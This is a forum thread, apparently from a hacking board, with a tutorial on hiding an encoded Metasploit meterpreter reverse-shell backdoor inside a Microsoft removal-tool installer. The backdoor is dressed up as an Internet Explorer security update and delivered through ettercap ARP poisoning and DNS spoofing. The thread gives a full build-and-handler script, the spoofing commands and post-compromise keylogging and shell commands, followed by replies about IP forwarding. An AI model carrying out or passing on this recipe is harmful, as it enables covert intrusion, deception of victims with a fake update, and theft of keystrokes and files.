covering up a meterpreter backdoor

[LHYX1]

Hi everybody,

Here is a tutorial on how to create an undetectible meterpreter backdoor and cover it up as an internet explorer security update. I created a very basic script that creates the meterpreter backdoor and starts the multi/handler.
I will inject the payload into the Microsoft Windows Malicious Software Removal Tool wich is available for download here.

Download details: Microsoft® Windows® Malicious Software Removal Tool (KB890830)

And I will use ettercap to dns_spoof the victim to the fake internet explorer security update page.

Save my script as myscript.sh:

Code:

#!/bin/sh
clear
cd /pentest/exploits/framework3
echo "*************************************"
echo "              creating a meterpreter backdoor          "
echo "*************************************"
echo -n "lhost ?"
read lhost
echo -n "lport?"
read lport 
echo -n "path to output file?"
read filename
echo -n "path to input file?"
read originalfile
echo "creating payload ..."
./msfpayload windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x $originalfile -o $filename
echo "payload created !"
echo "starting multi/handler ..."
./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport E

Make my script executable:

Code:

chmod 755 myscript.sh

Run my script:

Code:

./myscript.sh
lhost => your ip
lport => 5555
output => /root/backdoor.exe
input => /root/windows-kb890830-v3.12

Set up portforwarding:

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

Set up etter.dns located in /usr/share/ettercap

Code:

nano /usr/share/ettercap/etter.dns

Remove the part where microsoft is forwarded to linux and add these lines:

Code:

* A your ip
*.* A your ip
*.*.* A your ip
*.*.*.* A your ip

Create a webpage where you can download the file from or send me a message and I will send you my webpage.

I used photoshop to edit some pictures I found regarding internet explorer,
I created a very simple html page, added a css style sheet to position the download button
and to make the webpage look the same with every screen resolution.

Copy all the files into your /var/www/ directory.
Restart apache:

Code:

/etc/init.d/apache2 restart

Activate the dns spoofing:

Code:

ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /victim ip/ /gateway ip/

Gateway ip can be found by typing this from the terminal:

Code:

route -n

Now we just have to wait for our victim to run the backdoor. When the victim runs the backdoor you should see something like "session 1 opened". You can see your active sessions by typing:

Code:

sessions -r

You can jump into the first session by typing:

Code:

sessions -i 1

Now there are a lot of commands you are able to execute. You can see them all by typing:

Code:

help

A few examples:

Code:

sysinfo => get system info
shell => jump into a cmd shell
keyscan_start => scan for keyboard input
keyscan_dump => dump keyboard input
keyscan_stop => stop scanning
screenshot => take screenshot
upload
download

[Sp3ctr3]

Good tut..jst one thing..

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

isnt the packet forwardng not portforwarding?

[LHYX1]

I think "echo 1 > /proc/sys/net/ipv4/ip_forward" actually enables portforwarding.

[Sp3ctr3]

The /etc/sysctl.conf file

Code:

#
# /etc/sysctl.conf - Configuration file for setting system variables
# See sysctl.conf (5) for information.
#

#kernel.domainname = example.com
#net/ipv4/icmp_echo_ignore_broadcasts=1

# the following stops low-level messages on console
kernel.printk = 4 4 1 7

##############################################################3
# Functions previously found in netbase
#

# Uncomment the next line to enable Spoof protection (reverse-path filter)
#net.ipv4.conf.default.rp_filter=1

# Uncomment the next line to enable TCP/IP SYN cookies
#net.ipv4.tcp_syncookies=1

# Uncomment the next line to enable packet forwarding for IPv4
net.ipv4.conf.default.forwarding=1

# Uncomment the next line to enable packet forwarding for IPv6
#net.ipv6.conf.default.forwarding=1

The last paragraph says packetforwarding..if this parameter is changed then we dont have to do

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

again
So doesnt that mean its packet forwarding?
Also if you are pentesting within a LAN you dont need portforwarding right?

[LHYX1]

yes you are probably right. You forward the packtes from the victim to the router so it probably is packetforwarding. But i have followed some tutorials myself about arp poisoning and in most tutorials they say if arp poisoning doesn't work you should try typing "echo 1 > /net/proc/sys/ipv4/ip_forward".
So I don't realy know the reason for using this command in a LAN. Like you say, you normally only use portforwarding if you are running servers behind a NAT or something like that.

[Sp3ctr3]

I think what we are telling iptables not to drop packets that are'nt meant for us. If we dont echo 1 > /proc/sys/net/ipv4/ip_forward, then iptables takes a look at the ip packet, sees an ip different from ours and so drops it.